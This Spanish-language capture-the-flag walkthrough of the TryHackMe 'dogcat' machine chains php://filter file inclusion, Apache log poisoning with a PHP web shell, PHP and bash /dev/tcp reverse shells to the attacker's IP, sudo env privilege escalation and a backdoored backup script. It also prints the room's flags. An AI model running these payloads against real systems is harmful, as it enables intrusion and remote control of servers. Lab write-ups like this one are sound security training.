## Escaneo de puertos
~~~shell
sudo nmap -p- --open --min-rate 3500 -Pn -n $IP -oG open-port
~~~
~~~shell
cat open-port | grep -oP '\d{1,5}/open' | cut -d / -f1 | xargs | tr ' ' ',' | xclip -sel clip
~~~
~~~shell
#Misma utilidad pero para utilizarlo en forma de comando
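extractPorts () {
  # Parse an nmap grepable (-oG) file: print the scanned IP and the open
  # ports, and copy the comma-separated port list to the clipboard.
  #   $1 - path to the nmap -oG output file
  # Returns 1 (with a usage message on stderr) if the file is missing or
  # unreadable; otherwise 0.
  local file=$1
  local ports ip_address tmp
  if [[ -z "$file" || ! -r "$file" ]]; then
    printf 'Usage: extractPorts <nmap -oG file>\n' >&2
    return 1
  fi
  # "22/open/tcp//ssh///" -> "22"; join every match with commas.
  ports="$(grep -oP '\d{1,5}/open' -- "$file" | cut -d/ -f1 | paste -sd, -)"
  # First IPv4 literal after sort -u (the scanned host on a single-target scan).
  ip_address="$(grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' -- "$file" | sort -u | head -n 1)"
  # Unique temp file instead of a fixed, predictable name in the working directory.
  tmp="$(mktemp)" || return 1
  {
    printf '\n[*] Extracting information...\n\n'
    printf '\t[*] IP Address: %s\n' "$ip_address"
    printf '\t[*] Open ports: %s\n\n' "$ports"
  } > "$tmp"
  # printf '%s' avoids the trailing newline that echo would push into the clipboard.
  printf '%s' "$ports" | xclip -sel clip
  printf '[*] Ports copied to clipboard\n\n' >> "$tmp"
  # bat is optional; fall back to cat when it is not installed.
  if command -v bat >/dev/null 2>&1; then
    bat "$tmp"
  else
    cat -- "$tmp"
  fi
  rm -f -- "$tmp"
}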
~~~
~~~shell
nmap -sCV -p22,80 $IP -oN version-port
~~~
~~~shell
$ whatweb $IP
http://10.10.168.218 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.10.168.218], PHP[7.4.3], Title[dogcat], X-Powered-By[PHP/7.4.3]
~~~
~~~shell
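# Download the wordlist once into /usr/share/wordlist/, then run gobuster
# against the target. Expects $IP to be set; aborts if the directory is missing.
cd /usr/share/wordlist/ || exit 1
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/directory-list-2.3-medium.txt
# Scheme was misspelled ("htttp"); quote $IP so an empty/odd value cannot split the URL.
gobuster dir -u "http://$IP" -w /usr/share/wordlist/directory-list-2.3-medium.txt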
~~~
<https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-medium.txt>
~~~shell
$ curl http://10.10.168.218
<!DOCTYPE HTML>
<html>
<head>
<title>dogcat</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>dogcat</h1>
<i>a gallery of various dogs or cats</i>
<div>
<h2>What would you like to see?</h2>
<a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
</div>
</body>
</html>
~~~
~~~shell
$ curl http://$IP/?view=cat
<!DOCTYPE HTML>
<html>
<head>
<title>dogcat</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>dogcat</h1>
<i>a gallery of various dogs or cats</i>
<div>
<h2>What would you like to see?</h2>
<a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
Here you go!<img src="cats/6.jpg" />
</div>
</body>
</html>
~~~
~~~shell
~~~
<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter>
~~~shell
$ curl http://example.com/index.php?page=php://filter/convert.base64-encode/resource=dogs/../index.php
~~~
~~~shell
nano index
~~~
~~~shell
cat index | base64 -d | sponge index
~~~
~~~shell
ffuf -u http://$IP/FUZZ.php -w /usr/share/wordlist/directory-list-2.3-medium.txt -ic
~~~
Wrapper
~~~shell
curl "http://$IP/?view=php://filter/convert.base64-encode/resource=dogs/../flag"
~~~
~~~shell
echo "PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=" | base64 -d
<?php
$flag_1 = "THM{Th1s_1s_N0t_4_Catdog_ab67edfa}"
?>
~~~
~~~shell
$ curl "http://$IP/?view=dog/../../../../var/log/apache2/access.log&ext="
<!DOCTYPE HTML>
<html>
<head>
<title>dogcat</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>dogcat</h1>
<i>a gallery of various dogs or cats</i>
<div>
<h2>What would you like to see?</h2>
<a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
Here you go!127.0.0.1 - - [06/Jul/2023:02:46:00 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
...
127.0.0.1 - - [06/Jul/2023:03:17:47 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
10.18.41.138 - - [06/Jul/2023:03:17:53 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dogs/../flag HTTP/1.1" 200 703 "-" "curl/7.68.0"
127.0.0.1 - - [06/Jul/2023:03:18:18 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
127.0.0.1 - - [06/Jul/2023:03:18:48 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
127.0.0.1 - - [06/Jul/2023:03:19:18 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
10.18.41.138 - - [06/Jul/2023:03:19:32 +0000] "GET /?view=dog/../../../../var/log/apache2/access.log HTTP/1.1" 200 1024 "-" "curl/7.68.0"
127.0.0.1 - - [06/Jul/2023:03:19:49 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
</div>
</body>
</html>
~~~
~~~shell
curl http://$IP -H "User-Agent:"
~~~
~~~shell
$ curl "http://$IP/?view=dog/../../../../var/log/apache2/access.log&ext="
...
127.0.0.1 - - [06/Jul/2023:03:31:25 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
127.0.0.1 - - [06/Jul/2023:03:31:55 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
127.0.0.1 - - [06/Jul/2023:03:32:26 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
10.18.41.138 - - [06/Jul/2023:03:32:36 +0000] "GET / HTTP/1.1" 200 615 "-" "-"
</div>
</body>
</html>
~~~
Log poisoning
~~~shell
curl http://$IP --user-agent "<?php system(\$_GET['cmd']);?>"
~~~
~~~shell
curl "http://$IP/?view=dog/../../../../var/log/apache2/access.log&ext=" --user-agent "<?php system($_GET['cmd']);?>"
...
127.0.0.1 - - [06/Jul/2023:04:07:13 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
127.0.0.1 - - [06/Jul/2023:04:07:44 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
10.18.41.138 - - [06/Jul/2023:04:07:44 +0000] "GET / HTTP/1.1" 200 615 "-" "cat.php
cats
dog.php
dogs
flag.php
index.php
style.css
"
10.18.41.138 - - [06/Jul/2023:04:07:49 +0000] "GET /?view=dog/../../../../var/log/apache2/access.log&ext= HTTP/1.1" 200 25063 "-" "-"
</div>
</body>
~~~
## Shell reversa con php
<https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet>
~~~shell
sudo netcat -nlvp 443
~~~
~~~shell
$ ip a | grep tun0
7833: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100
inet 10.18.41.138/17 brd 10.18.127.255 scope global tun0
~~~
~~~shell
IP2=10.18.41.138
~~~
~~~shell
curl http://10.10.121.133/?view=dog/../../../../var/log/apache2/access.log&ext=&cmd=php -r '$sock=fsockopen("10.18.41.138",443);exec("/bin/sh -i <&3 >&3 2>&3");'
~~~
~~~shell
curl $'http://10.10.121.133/?view=dog/../../../../var/log/apache2/access.log&ext=&cmd=php+-r+\'$sock%3dfsockopen(\"10.18.41.138\",443)%3bexec(\"/bin/sh+-i+<%263+>%263+2>%263\")%3b\''
~~~
~~~shell
$ sudo netcat -nlvp 443
[sudo] password for fredy:
Listening on 0.0.0.0 443
Connection received on 10.10.121.133 54768
/bin/sh: 0: can't access tty; job control turned off
$ tty
not a tty
$
~~~
## Convertir a tty
Utilizamos `script /dev/null -c bash`
El comando `script /dev/null -c bash` inicia una nueva sesión interactiva de Bash dentro de `script`, usando `/dev/null` como archivo de registro: obtenemos una pseudo-terminal (como muestra `tty` más abajo) sin dejar una transcripción de la sesión guardada en ningún archivo.
La utilidad script registra una sesión de terminal, capturando todo lo que se muestra en la pantalla y guardándolo en un archivo de registro. Sin embargo, al especificar /dev/null como archivo de registro, se descarta toda la salida.
~~~shell
sudo netcat -nlvp 443
[sudo] password for fredy:
Listening on 0.0.0.0 443
Connection received on 10.10.121.133 54768
/bin/sh: 0: can't access tty; job control turned off
$ tty
not a tty
$ script /dev/null -c bash
Script started, file is /dev/null
www-data@c11e11b1ef6e:/var/www/html$ tty
tty
/dev/pts/0
www-data@c11e11b1ef6e:/var/www/html$
~~~
Mandamos a segundo plano con `ctrl+z` y luego ingresamos `stty raw -echo`.
* `stty raw -echo`: El comando `stty` se utiliza para cambiar o mostrar la configuración de la terminal. En este caso, `raw` configura la terminal en modo "crudo" o "raw", lo que significa que los caracteres se manejan individualmente sin realizar ningún procesamiento especial. `-echo` desactiva el eco de los caracteres ingresados, lo que evita que se muestren en pantalla.
~~~shell
stty raw -echo; fg
~~~
Notemos que ingresamos el comando `fg` directamente en la misma línea porque no vamos a ver el STDIN en pantalla.
~~~shell
reset xterm
www-data@c11e11b1ef6e:/var/www/html$
~~~
## Configurar nuestra nueva terminal
~~~shell
uqbar@un$ stty size
34 130
~~~
~~~shell
www-data@c11e11b1ef6e:/var/www/html$ stty rows 34 columns 130
~~~
## Exploración
¿Estamos en un host virtual?
~~~shell
www-data@c11e11b1ef6e:/var/www$ uname -a
Linux c11e11b1ef6e 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 GNU/Linux
~~~
El archivo `/proc/net/fib_trie` expone la tabla de rutas IPv4 del kernel; las entradas marcadas `host LOCAL` corresponden a las direcciones asignadas a la propia máquina, por eso filtramos por ese texto.
~~~shell
www-data@c11e11b1ef6e:/var/www$ cat /proc/net/fib_trie | grep -i "host local" -C 1
/32 link BROADCAST
/8 host LOCAL
|-- 127.0.0.1
/32 host LOCAL
|-- 127.255.255.255
--
|-- 172.17.0.2
/32 host LOCAL
|-- 172.17.255.255
--
/32 link BROADCAST
/8 host LOCAL
|-- 127.0.0.1
/32 host LOCAL
|-- 127.255.255.255
--
|-- 172.17.0.2
/32 host LOCAL
|-- 172.17.255.255
~~~
~~~shell
www-data@c11e11b1ef6e:/var/www$ ls -al /
total 80
drwxr-xr-x 1 root root 4096 Jul 6 02:44 .
drwxr-xr-x 1 root root 4096 Jul 6 02:44 ..
-rwxr-xr-x 1 root root 0 Jul 6 02:44 .dockerenv
drwxr-xr-x 1 root root 4096 Feb 26 2020 bin
drwxr-xr-x 2 root root 4096 Feb 1 2020 boot
drwxr-xr-x 5 root root 340 Jul 6 02:45 dev
drwxr-xr-x 1 root root 4096 Jul 6 02:44 etc
drwxr-xr-x 2 root root 4096 Feb 1 2020 home
drwxr-xr-x 1 root root 4096 Feb 26 2020 lib
drwxr-xr-x 2 root root 4096 Feb 24 2020 lib64
drwxr-xr-x 2 root root 4096 Feb 24 2020 media
drwxr-xr-x 2 root root 4096 Feb 24 2020 mnt
drwxr-xr-x 1 root root 4096 Jul 6 02:45 opt
dr-xr-xr-x 111 root root 0 Jul 6 02:45 proc
drwx------ 1 root root 4096 Mar 10 2020 root
drwxr-xr-x 1 root root 4096 Feb 26 2020 run
drwxr-xr-x 1 root root 4096 Feb 26 2020 sbin
drwxr-xr-x 2 root root 4096 Feb 24 2020 srv
dr-xr-xr-x 13 root root 0 Jul 6 02:45 sys
drwxrwxrwt 1 root root 4096 Mar 10 2020 tmp
drwxr-xr-x 1 root root 4096 Feb 24 2020 usr
drwxr-xr-x 1 root root 4096 Feb 26 2020 var
~~~
Notemos que existe `.dockerenv`, lo que indica que estamos dentro de un contenedor Docker.
~~~shell
www-data@c11e11b1ef6e:/var/www$ ls -al /opt
total 12
drwxr-xr-x 1 root root 4096 Jul 6 02:45 .
drwxr-xr-x 1 root root 4096 Jul 6 02:44 ..
drwxr-xr-x 2 root root 4096 Apr 8 2020 backups
~~~
~~~shell
www-data@c11e11b1ef6e:/var/www$ ls -al /opt/backups/
total 2892
drwxr-xr-x 2 root root 4096 Apr 8 2020 .
drwxr-xr-x 1 root root 4096 Jul 6 02:45 ..
-rwxr--r-- 1 root root 69 Mar 10 2020 backup.sh
-rw-r--r-- 1 root root 2949120 Jul 6 06:06 backup.tar
~~~
Puertos y conexiones
~~~shell
root@c11e11b1ef6e:/var/www# cat /proc/net/tcp
sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 25020 1 0000000000000000 100 0 0 10 0
1: 0100007F:C550 0100007F:0050 06 00000000:00000000 03:00000DE6 00000000 0 0 0 3 0000000000000000
2: 020011AC:0050 8A29120A:C8FE 01 00000000:00000000 02:0004AA44 00000000 33 0 51490 2 0000000000000000 51 4 1 10 8
3: 020011AC:D5F0 8A29120A:01BB 01 00000000:00000000 00:00000000 00000000 33 0 51923 2 0000000000000000 39 4 33 4 4
4: 0100007F:C54E 0100007F:0050 06 00000000:00000000 03:00000214 00000000 0 0 0 3 0000000000000000
~~~
## Escalación de privilegios
~~~shell
www-data@c11e11b1ef6e:/var/www$ sudo -l
Matching Defaults entries for www-data on c11e11b1ef6e:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on c11e11b1ef6e:
(root) NOPASSWD: /usr/bin/env
~~~
Notemos que podemos ejecutar `env` como root.


~~~shell
www-data@c11e11b1ef6e:/var/www$ sudo env /bin/sh
# bash
root@c11e11b1ef6e:/var/www# ls ~
flag3.txt
root@c11e11b1ef6e:/var/www# cat ~/flag3.txt
THM{D1ff3r3nt_3nv1ronments_874112}
~~~
## Linux process snooping con pspy
<https://github.com/DominicBreuker/pspy>
~~~shell
root@c11e11b1ef6e:/var/www# ./pspy
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/07/06 06:33:06 CMD: UID=0 PID=2332 | ./pspy
2023/07/06 06:33:06 CMD: UID=0 PID=2035 | bash
2023/07/06 06:33:06 CMD: UID=0 PID=2027 | /bin/sh
2023/07/06 06:33:06 CMD: UID=0 PID=2026 | sudo env /bin/sh
2023/07/06 06:33:06 CMD: UID=33 PID=1520 | bash
2023/07/06 06:33:06 CMD: UID=33 PID=1519 | sh -c bash
2023/07/06 06:33:06 CMD: UID=33 PID=1518 | script /dev/null -c bash
2023/07/06 06:33:06 CMD: UID=33 PID=820 | /bin/sh -i
2023/07/06 06:33:06 CMD: UID=33 PID=819 | sh -c /bin/sh -i <&3 >&3 2>&3
2023/07/06 06:33:06 CMD: UID=33 PID=812 | php -r $sock=fsockopen("10.18.41.149",443);exec("/bin/sh -i <&3 >&3 2>&3");
2023/07/06 06:33:06 CMD: UID=33 PID=811 | sh -c php -r '$sock=fsockopen("10.18.41.149",443);exec("/bin/sh -i <&3 >&3 2>&3");'
2023/07/06 06:33:06 CMD: UID=33 PID=29 | apache2 -DFOREGROUND
2023/07/06 06:33:06 CMD: UID=33 PID=28 | apache2 -DFOREGROUND
2023/07/06 06:33:06 CMD: UID=33 PID=27 | apache2 -DFOREGROUND
2023/07/06 06:33:06 CMD: UID=33 PID=21 | apache2 -DFOREGROUND
2023/07/06 06:33:06 CMD: UID=33 PID=20 | apache2 -DFOREGROUND
2023/07/06 06:33:06 CMD: UID=33 PID=19 | apache2 -DFOREGROUND
2023/07/06 06:33:06 CMD: UID=33 PID=18 | apache2 -DFOREGROUND
2023/07/06 06:33:06 CMD: UID=33 PID=17 | apache2 -DFOREGROUND
2023/07/06 06:33:06 CMD: UID=0 PID=1 | apache2 -DFOREGROUND
2023/07/06 06:33:36 CMD: UID=0 PID=2345 | runc init
2023/07/06 06:33:36 CMD: UID=0 PID=2350 | /bin/sh -c curl --silent --fail http://127.0.0.1:80/
~~~
## Recordemos `/opt/backups/backup.sh`
~~~shell
root@c11e11b1ef6e:/var/www# cd /opt/backups/
root@c11e11b1ef6e:/opt/backups# cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
~~~
~~~shell
uqbar@un$ sudo netcat -nlvp 443
[sudo] password for fredy:
Listening on 0.0.0.0 443
~~~
~~~shell
root@c11e11b1ef6e:/opt/backups# echo "bash -i >& /dev/tcp/10.18.41.138/443 0>&1" >> backup.sh
root@c11e11b1ef6e:/opt/backups# cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
bash -i >& /dev/tcp/10.18.41.138/443 0>&1
~~~
~~~shell
sudo netcat -nlvp 443
Connection received on 10.10.121.133 51062
bash: cannot set terminal process group (28790): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# ls
container
flag4.txt
root@dogcat:~# cat flag4.txt
THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}
~~~